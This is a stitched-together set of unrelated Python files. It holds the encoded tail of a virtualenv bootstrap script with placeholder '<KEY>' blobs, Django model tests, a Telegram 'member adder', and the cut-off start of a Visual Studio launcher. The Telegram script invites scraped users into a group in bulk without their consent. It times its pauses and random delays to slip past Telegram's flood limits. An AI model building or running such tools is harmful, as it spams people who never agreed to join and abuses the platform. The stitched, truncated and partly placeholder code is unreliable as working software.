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
178BYnMUkw==
""".decode("base64").decode("zlib")
##file distribute_setup.py
DISTRIBUTE_SETUP_PY = """
<KEY>
<KEY>
""".decode("base64").decode("zlib")
##file activate.sh
ACTIVATE_SH = """
<KEY>
""".decode("base64").decode("zlib")
##file activate.bat
ACTIVATE_BAT = """
<KEY>
""".decode("base64").decode("zlib")
##file deactivate.bat
DEACTIVATE_BAT = """
<KEY>
""".decode("base64").decode("zlib")
##file distutils-init.py
DISTUTILS_INIT = """
<KEY>
""".decode("base64").decode("zlib")
##file distutils.cfg
DISTUTILS_CFG = """
<KEY>
""".decode("base64").decode("zlib")
##file activate_this.py
ACTIVATE_THIS = """
<KEY>
""".decode("base64").decode("zlib")
if __name__ == '__main__':
main()
## TODO:
## Copy python.exe.manifest
## Monkeypatch distutils.sysconfig
|
from django.test import TestCase
from django.utils.timezone import now
from users.models import User, Profile
from streamblocks.models import IndexedParagraph, LandscapeGallery
from cronache.models import Event, Location
#from criterium.models import Race, Athlete
class LocationModelTest(TestCase):
    """Behaviour of the Location model: __str__ and the Google-Maps helpers."""

    @classmethod
    def setUpTestData(cls):
        # One location without a map link, one with an embeddable iframe + link.
        Location.objects.create(title='Here', address='Nowhere St.',
            gmap_embed='http')
        Location.objects.create(title='There', address='Somewhere St.',
            gmap_embed='<iframe src="http://foo.bar"></iframe>',
            gmap_link='http://foo.bar')

    def test_location_model_str_method(self):
        self.assertEqual(str(Location.objects.get(slug='here')), 'Here')

    def test_location_model_get_gmap_link_none(self):
        # No gmap_link set -> placeholder dash.
        self.assertEqual(Location.objects.get(slug='here').get_gmap_link(), '-')

    def test_location_model_get_gmap_link(self):
        there = Location.objects.get(slug='there')
        self.assertEqual(
            there.get_gmap_link(),
            '<a href="http://foo.bar" class="btn" target="_blank">Mappa</a>')

    def test_location_model_stripped_gmap_embed(self):
        # Saving should strip the iframe wrapper down to the bare URL.
        there = Location.objects.get(slug='there')
        self.assertEqual(there.gmap_embed, 'http://foo.bar')
class EventModelTest(TestCase):
    """Tests for the Event model: string repr, badge colour by date, image
    fallback to the location, chronicle flag, notice processing and the
    stream-search text extraction."""

    @classmethod
    def setUpTestData(cls):
        # A user opted in to notifications (yes_spam) so the 'SPAM' notice
        # gets processed when the event below is created.
        user = User.objects.create(username='recipient', password='<PASSWORD>',
            email='<EMAIL>')
        profile = Profile.objects.get(pk=user.id)
        profile.yes_spam = True
        profile.save()
        location = Location.objects.create(title='Here', address='Nowhere St.',
            gmap_embed='http', fb_image='uploads/location.jpg')
        Event.objects.create(title='Past event',
            date='2019-05-10 15:53:00+02', location=location
            )
        Event.objects.create(title='Future event',
            date='2119-05-10 15:53:00+02', location=location
            )
        # Stream-block content referenced by id from the event's JSON stream.
        IndexedParagraph.objects.create(id=37, title='Foo', body='Bar')
        LandscapeGallery.objects.create(id=38, fb_image='uploads/image.jpg')
        Event.objects.create(title='Today event', location=location,
            stream='[{"unique_id":"4h5dps","model_name":"IndexedParagraph","id":37,"options":{}}]',
            carousel='[{"unique_id":"dps4h5","model_name":"LandscapeGallery","id":[38],"options":{}}]',
            notice='SPAM'
            )

    def test_event_model_str_method(self):
        event = Event.objects.get(slug='today-event')
        self.assertEqual(str(event), 'Today event')

    def test_event_model_get_badge_color_past(self):
        event = Event.objects.get(slug='past-event')
        self.assertEqual(event.get_badge_color(), 'secondary')

    def test_event_model_get_badge_color_future(self):
        event = Event.objects.get(slug='future-event')
        self.assertEqual(event.get_badge_color(), 'success')

    def test_event_model_get_badge_color_today(self):
        event = Event.objects.get(slug='today-event')
        self.assertEqual(event.get_badge_color(), 'warning')

    def test_event_model_get_image(self):
        event = Event.objects.get(slug='today-event')
        # here I extract the FilObject.path for convenience
        # Fixed deprecated assertEquals alias (removed in Python 3.12).
        self.assertEqual(event.get_image().path, 'uploads/image.jpg')

    def test_event_model_get_image_from_location(self):
        event = Event.objects.get(slug='past-event')
        # here I extract the FilObject.path for convenience
        self.assertEqual(event.get_image().path, 'uploads/location.jpg')

    def test_event_model_get_chronicle_true(self):
        event = Event.objects.get(slug='past-event')
        self.assertTrue(event.get_chronicle())

    def test_event_model_get_chronicle_false(self):
        event = Event.objects.get(slug='future-event')
        self.assertFalse(event.get_chronicle())

    def test_event_model_notice_status(self):
        # 'SPAM' notices are presumably flipped to 'DONE' once the mail is
        # sent on save — confirm against the Event model.
        event = Event.objects.get(slug='today-event')
        self.assertEqual(event.notice, 'DONE')

    def test_article_stream_search(self):
        event = Event.objects.get(slug='today-event')
        self.assertEqual(event.stream_search,
            '\n \n Foo\n \n \n \n Bar \n \n\n')
|
#!/bin/env python3
#code by g1ng3rb1t3 (kevo)
# Interactive Telegram "member adder": logs in with telethon, reads scraped
# members from members.csv and invites them into a chosen megagroup.
# The whole script runs inside one try block so the except clauses at the
# bottom can handle a missing CSV, connection failures and Ctrl-C globally.
try:
    from telethon.sync import TelegramClient
    from telethon.tl.functions.messages import GetDialogsRequest
    from telethon.tl.types import InputPeerEmpty, InputPeerChannel, InputPeerUser
    from telethon.errors.rpcerrorlist import FloodWaitError
    from telethon.errors.rpcerrorlist import PeerFloodError, UserPrivacyRestrictedError
    from telethon.errors.rpcerrorlist import UserNotMutualContactError
    from telethon.tl.functions.channels import InviteToChannelRequest
    from telethon.errors import SessionPasswordNeededError
    import configparser
    import os
    import sys
    import csv
    import traceback
    import time
    from time import sleep
    import random
    import colorama
    import progressbar
    from colorama import Fore, Back, Style

    # ANSI colour helpers used throughout the prompts.
    UBlue='\033[4;34m'
    re="\033[1;31m"  # NOTE(review): binds the name `re` (shadows the stdlib module name)
    colorama.init(autoreset=True)
    green = Style.RESET_ALL+Style.BRIGHT+Fore.GREEN
    reset = Style.RESET_ALL
    white = Style.DIM+Fore.WHITE
    magenta = Style.RESET_ALL+Style.BRIGHT+Fore.MAGENTA
    yellow = Style.RESET_ALL+Style.BRIGHT+Fore.YELLOW
    red = Style.RESET_ALL+Style.BRIGHT+Fore.RED
    blue = Style.RESET_ALL+Style.BRIGHT+Fore.BLUE

    def animated_marker():
        # ~5 second animated "Starting" spinner (50 ticks x 0.1s).
        widgets = [' Starting: ', progressbar.AnimatedMarker()]
        bar = progressbar.ProgressBar(widgets=widgets).start()
        for i in range(50):
            time.sleep(0.10)
            bar.update(i)

    os.system("clear")
    # API credentials previously written into config.data (by config.py).
    cpass = configparser.RawConfigParser()
    cpass.read('config.data')
    try:
        api_id = cpass['cred']['id']
        api_hash = cpass['cred']['hash']
        phone = cpass['cred']['phone']
        client = TelegramClient(phone, api_id, api_hash)
    except KeyError:
        # config.data missing or incomplete -> tell the user to run config.py.
        os.system('clear')
        print("{}[{}!{}] {}ERRor".format(blue,red,blue,red))
        sleep(2)
        print("{}[{}!{}] {}Run config.py first".format(blue,red,blue,yellow))
        sys.exit(1)
    animated_marker()
    os.system("toilet --gay -f smblock 'Telegram adder'")
    print(" "*19+"by (g1ng3rb1t3)kevo")
    client.connect()
    if not client.is_user_authorized():
        # First run: request a login code; fall back to the 2FA password.
        try:
            client.send_code_request(phone)
            client.sign_in(phone, input('{}[+] {}Enter the code: '.format(blue,white)))
        except SessionPasswordNeededError:
            password = input('{}[+] {}Input Your 2factor password>> '.format(blue,white))
            me = client.start(phone,password)
    # Load previously scraped members (username, id, access_hash, name rows).
    users = []
    with open(r"members.csv", encoding='UTF-8') as f: #Enter your file name
        rows = csv.reader(f,delimiter=",",lineterminator="\n")
        next(rows, None)
        for row in rows:
            user = {}
            user['username'] = row[0]
            user['id'] = int(row[1])
            user['access_hash'] = int(row[2])
            user['name'] = row[3]
            users.append(user)
    # Fetch up to 200 dialogs and keep only megagroups as invite targets.
    chats = []
    last_date = None
    chunk_size = 200
    groups = []
    result = client(GetDialogsRequest(
        offset_date=last_date,
        offset_id=0,
        offset_peer=InputPeerEmpty(),
        limit=chunk_size,
        hash=0
    ))
    chats.extend(result.chats)
    for chat in chats:
        try:
            if chat.megagroup == True:
                groups.append(chat)
        except:
            continue  # NOTE(review): bare except silently skips dialogs without .megagroup
    print('{}Groups You can add members to'.format(UBlue))
    i = 0
    for group in groups:
        print(blue+'[0'+str(i)+']'+white+ '-> {}{}'.format(red,group.title))
        i += 1
    g_index = input("\n{}[+] {}Choose a group to add members>> {}".format(blue,white,green))
    target_group = groups[int(g_index)]
    target_group_entity = InputPeerChannel(target_group.id, target_group.access_hash)
    mode = input("{}[=] {}Use [go] or [start]> {}".format(blue,white,green))
    n = 0
    for user in users:
        n += 1
        if n % 80 == 0:
            sleep(60)  # pause every 80 invites to dodge rate limits
        try:
            if mode in ('go','start'):
                print("{}[+] {}Adding {}{}".format(blue,white,green,user['id']))
                if user['username'] == "":
                    continue  # cannot resolve an entity without a username
                user_to_add = client.get_input_entity(user['username'])
            else:
                print("{}[{}!{}] {}Invalid option".format(blue,red,blue,red))
                sleep(1)
                print("{}[{}!{}] {}Use [go] [start] to add members".format(blue,red,blue,red))
                sleep(2)
                exit()
            client(InviteToChannelRequest(target_group_entity, [user_to_add]))
            print("{}[=] {}Added successfully".format(blue,green))
            time.sleep(random.randrange(0, 5))  # randomised delay between invites
        except PeerFloodError:
            print("{}[{}!{}] {}Flood Error,Take a break.".format(blue,red,blue,red))
            sleep (5)
            exit("{}[{}X{}] {}Closing".format(blue,red,blue,red))
        except UserPrivacyRestrictedError:
            print("{}[{}!{}] {}User privacy restriction.skipped".format(blue,red,blue,red))
            time.sleep(random.randrange(0, 5))
        except FloodWaitError:
            print('{}[{}!{}] {}You have to wait 40752 seconds'.format(blue,red,blue,red))
            sleep(5)
            exit('{}[{}!{}] {}Closing'.format(blue,red,blue,red))
        except UserNotMutualContactError:
            print("{}[{}!{}] {}User not a mutual contact. Skipped".format(blue,red,blue,red))
            time.sleep(random.randrange(0, 5))
        except KeyboardInterrupt:
            print("\n")
            print("{}[+] {}Closing".format(blue,yellow))
            sleep(1)
            print("{}[+] {}Created by g1ng3rb1t3".format(blue,red))
            print("{}[=] {}https://t.me/Iamk3lv1n".format(blue,red))
            sleep(1)
            sys.exit()
except FileNotFoundError:
    # members.csv not found -> tell the user to scrape members first.
    print('{}[{}!{}] {}Found no members to add'.format(blue,red,blue,red))
    sleep(1)
    print('{}[{}!{}] {}Run scrapper.py first to get members'.format(blue,red,blue,green))
    sleep(2)
    exit()
except ConnectionError:
    print("{}[{}!{}] {}Failed to connect to telegram 5 times".format(blue,red,blue,red))
    sleep(2)
    print("\a{}[{}X{}] {}Check your connection".format(blue,red,blue,red))
    sleep(2)
except KeyboardInterrupt:
    print("\n")
    print("{}[+] {}Closing".format(blue,yellow))
    sleep(1)
    print("{}[+] {}Created by g1ng3rb1t3".format(blue,red))
    print("{}[=] {}https://t.me/Iamk3lv1n\a\a".format(blue,red))
    sleep(1)
sys.exit() |
#!/usr/bin/env python3
#
# vsdev.py: https://github.com/kiyolee/vs-tools.git
#
# MIT License
#
# Copyright (c) 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
usage 1: %(__file__)s [options] [devenv-options ...]
Start specific version of Visual Studio.
options:
--msvc6, --vc6
Start MSVC6 if available.
--vs(2003|2005|2008|2010|2012|2013|2015|2017|2019|2022)
--(2003|2005|2008|2010|2012|2013|2015|2017|2019|2022)
Start specific version of Visual Studio if available.
-h, --help
Print this help.
usage 2: %(__file__)s [-l|--list]
List all Visual Studio found.
"""
import sys
# Hard requirement: this launcher only makes sense on Windows.
assert sys.platform == 'win32'
import os
import subprocess
import re
import nt
import winreg
# __file__ is not defined after compiled with cx_Freeze
if '__file__' not in globals(): __file__ = sys.argv[0]
__program__ = os.path.basename(__file__)
# Substitute the %(__file__)s placeholders inside the module docstring above.
__doc__ = __doc__ % globals()
# IS_OS64BIT starts from PROCESSOR_ARCHITECTURE and, for a 32-bit
# interpreter, is corrected below with an IsWow64Process probe.
IS_OS64BIT = (os.environ['PROCESSOR_ARCHITECTURE'] == 'AMD64')
IS_WOW64 = False
if not IS_OS64BIT:
    import ctypes
    def _is_wow64():
        # True when this 32-bit process runs under WOW64 (i.e. on a 64-bit OS).
        k = ctypes.windll.kernel32
        p = k.GetCurrentProcess()
        i = ctypes.c_int()
        if k.IsWow64Process(p, ctypes.byref(i)):
            return i.value != 0
        return False
    IS_OS64BIT = IS_WOW64 = _is_wow64()
    del _is_wow64
    del ctypes
#print('# IS_OS64BIT=' + str(IS_OS64BIT) + ' IS_WOW64=' + str(IS_WOW64))
def get_program_files_directories():
    """Return the (32-bit, 64-bit) Program Files paths.

    The 64-bit path is '' on a genuinely 32-bit Windows, or when it cannot
    be derived from ProgramFiles(x86) under WOW64.
    """
    if not IS_OS64BIT:
        return os.environ['ProgramFiles'], ''
    pf32 = os.environ['ProgramFiles(x86)']
    if not IS_WOW64:
        return pf32, os.environ['ProgramFiles']
    # 32-bit python on 64-bit windows: ProgramFiles mirrors ProgramFiles(x86)
    # for 32-bit binaries, so derive the 64-bit directory by stripping the
    # ' (x86)' suffix instead.
    suffix = ' (x86)'
    pf64 = pf32[:-len(suffix)] if pf32.endswith(suffix) else ''
    return pf32, pf64
# Registry root under which classic Visual Studio versions register.
VS_KEY = r'Software\Microsoft\VisualStudio'
# MSVC6 (32-bit only)
def get_msdev_exe():
    """Locate msdev.exe for Visual C++ 6 via the registry, or return None."""
    h, h2 = None, None
    try:
        # Read the 32-bit registry view when running on a 64-bit OS.
        wowkey = winreg.KEY_WOW64_32KEY if IS_OS64BIT else 0
        vs6_key = VS_KEY + r'\6.0'
        #print('#', vs6_key, wowkey)
        h = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vs6_key, 0, wowkey | winreg.KEY_READ)
        h2 = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vs6_key + r'\Setup', 0, wowkey | winreg.KEY_READ)
        instdir, t = winreg.QueryValueEx(h, 'InstallDir')
        assert t == winreg.REG_SZ
        commondir, t = winreg.QueryValueEx(h2, 'VsCommonDir')
        assert t == winreg.REG_SZ
        # Sanity check: InstallDir must live underneath VsCommonDir.
        assert instdir.startswith(commondir) and (commondir[-1] == os.path.sep or instdir[len(commondir)] == os.path.sep)
        msdev_exe = os.path.join(commondir, 'msdev98', 'bin', 'msdev.exe')
        if os.path.isfile(msdev_exe):
            return msdev_exe
    except WindowsError as err:
        # Key/value absent -> MSVC6 not installed; fall through to None.
        #print(err, file=sys.stderr)
        pass
    finally:
        # Always release the registry handles.
        if h:
            winreg.CloseKey(h)
            del h
        if h2:
            winreg.CloseKey(h2)
            del h2
    return None
# VS2003|2005|2008|2010|2012|2013|2015 (32-bit only)
def get_devenv_exe(vs_ver):
    """Locate devenv.exe for a registry-based VS version *vs_ver* (e.g. '9.0'),
    or return None when that version is not installed."""
    h, h2 = None, None
    try:
        # Read the 32-bit registry view when running on a 64-bit OS.
        wowkey = winreg.KEY_WOW64_32KEY if IS_OS64BIT else 0
        vsX_key = VS_KEY + '\\' + vs_ver
        #print('#', suffix[1:], vsX_key, wowkey)
        h = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vsX_key, 0, wowkey | winreg.KEY_READ)
        h2 = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vsX_key + r'\Setup\VS', 0, wowkey | winreg.KEY_READ)
        instdir, t = winreg.QueryValueEx(h, 'InstallDir')
        assert t == winreg.REG_SZ
        devenv_exe, t = winreg.QueryValueEx(h2, 'EnvironmentPath')
        assert t == winreg.REG_SZ
        # Sanity check: EnvironmentPath must live underneath InstallDir.
        assert devenv_exe.startswith(instdir) and (instdir[-1] == os.path.sep or devenv_exe[len(instdir)] == os.path.sep)
        if os.path.isfile(devenv_exe):
            return devenv_exe
    except WindowsError as err:
        # Missing key/value -> that VS version is not installed.
        #print(err, file=sys.stderr)
        pass
    finally:
        if h:
            winreg.CloseKey(h)
            del h
        if h2:
            winreg.CloseKey(h2)
            del h2
    return None
def vswhere_get_devenv_exe(devenvs, pf32, pf64):
    """Discover VS2017+ instances via vswhere.exe and add them to *devenvs*.

    Parses vswhere's "key: value" text output: each 'instanceId' starts a
    record (terminated by a blank line) whose productPath is stored under an
    id like 'vs2019'; duplicate versions get a '_2', '_3', ... suffix.
    """
    vswhere = os.path.join(pf32, 'Microsoft Visual Studio', 'Installer', 'vswhere.exe')
    if not os.path.exists(vswhere):
        vswhere = os.path.join(pf64, 'Microsoft Visual Studio', 'Installer', 'vswhere.exe')
    if not os.path.exists(vswhere):
        return
    cmdp = subprocess.Popen([ vswhere, '-nologo' ], stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    sout, serr = cmdp.communicate()
    # Anything on stderr or a nonzero exit means unusable output.
    if cmdp.returncode != 0 or serr:
        return
    it = iter(sout.decode('utf-8').split('\r\n'))
    try:
        while True:
            s = next(it).split(': ', 1)
            assert len(s) == 2
            if s[0] == 'instanceId':
                # Scan this instance's block for product path and version.
                pp, pv = '', ''
                try:
                    while True:
                        s = next(it)
                        if not s: break
                        s = s.split(': ', 1)
                        assert len(s) == 2
                        if s[0] == 'productPath':
                            pp = s[1]
                        elif s[0] == 'catalog_productLineVersion':
                            pv = s[1]
                except StopIteration:
                    pass
                if pp and pv:
                    pv = 'vs' + pv
                    # Register under the first free id: 'vsNNNN', 'vsNNNN_2', ...
                    for i in range(1, 99):
                        vs_id = pv if i == 1 else pv + ('_%d' % i)
                        if not vs_id in devenvs:
                            devenvs[vs_id] = pp
                            break
    except StopIteration:
        # End of vswhere output.
        pass
def get_devenv_list():
    """Collect every detected IDE executable, keyed by id ('msvc6', 'vs2019', ...)."""
    found = {}
    # MSVC6 registers separately from the later versioned products.
    msdev = get_msdev_exe()
    if msdev:
        found['msvc6'] = msdev
    # Registry-based releases: internal version number -> friendly id.
    registry_versions = (
        ('7.0', 'vs2003'),
        ('7.1', 'vs2003'),
        ('8.0', 'vs2005'),
        ('9.0', 'vs2008'),
        ('10.0', 'vs2010'),
        ('11.0', 'vs2012'),
        ('12.0', 'vs2013'),
        ('14.0', 'vs2015'),
    )
    for version, vs_id in registry_versions:
        exe = get_devenv_exe(version)
        if exe:
            found[vs_id] = exe
    # VS2017 and later are discovered through vswhere.exe, not the registry.
    pf32, pf64 = get_program_files_directories()
    vswhere_get_devenv_exe(found, pf32, pf64)
    return found
def get_vs_id_prioritized(devenvs):
    """Return the ids of *devenvs* newest-Visual-Studio-first.

    'vs*' ids sort before anything else (msvc6 comes last); among equal
    versions, the unsuffixed instance precedes '_2', '_3', ... suffixes.
    """
    def sort_key(ident):
        group = 0 if ident.startswith('vs') else -1
        if group == 0 and '_' in ident:
            base, _, tail = ident.rpartition('_')
            try:
                # Negate so that, after reverse sorting, _2 < _3 order holds.
                return group, base, -int(tail)
            except ValueError:
                pass
        return group, ident, 0
    return sorted(devenvs, key=sort_key, reverse=True)
def default_devenv(devenvs):
    """Pick the highest-priority Visual Studio id, or '' when none is installed."""
    ordered = get_vs_id_prioritized(devenvs)
    return ordered[0] if ordered else ''
def print_devenvs(devenvs, devdef):
    """Print every detected Visual Studio in id order, flagging the default."""
    ids = sorted(devenvs)
    if not ids:
        print('No Visual Studio found.')
        return
    print('Available Visual Studio %s:' % ('versions' if len(ids) > 1 else 'version'))
    labels = [(k, k + '(default)' if k == devdef else k) for k in ids]
    # Pad every label to one column past the widest one.
    width = max(len(label) for _, label in labels) + 1
    for k, label in labels:
        print('%-*s%s' % (width, label, devenvs[k]))
def clean_env():
    """Build a sanitized copy of the environment for launching the IDE.

    Strips every variable a previous "Developer Command Prompt" session may
    have left behind, forces PreferredToolArchitecture=x64, and rebuilds PATH
    from the registry's system + user values, expanding %VAR% references.
    """
    # Variables set by vcvars*/VsDevCmd that must not leak into the IDE.
